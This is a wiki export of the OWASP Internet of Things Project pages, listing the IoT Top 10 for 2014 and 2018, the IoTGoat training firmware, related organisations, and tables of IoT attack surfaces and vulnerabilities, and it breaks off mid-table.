|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
For more information on getting started, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal, April 21, 2015<br />
* Defcon 23: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler, August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:2014_2018Mapping.png&diff=250072File:2014 2018Mapping.png2019-04-12T20:23:08Z<p>Aaron.guzman: </p>
<hr />
<div>2014_2018 mapping</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:2014_2018Mapping.png&diff=250071File:2014 2018Mapping.png2019-04-12T20:06:29Z<p>Aaron.guzman: </p>
<hr />
<div>2014 2018 mapping</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=249918OWASP Internet of Things Project2019-04-10T01:23:54Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem; no list can cover every aspect of an IoT environment. A mapping is not always one-to-one; in such cases, similar recommendations and/or controls are listed. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem; no list can cover every aspect of an IoT environment. A mapping is not always one-to-one; in such cases, similar recommendations and/or controls are listed. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 to 5 failed login attempts, i.e. no lockout or rate limiting<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
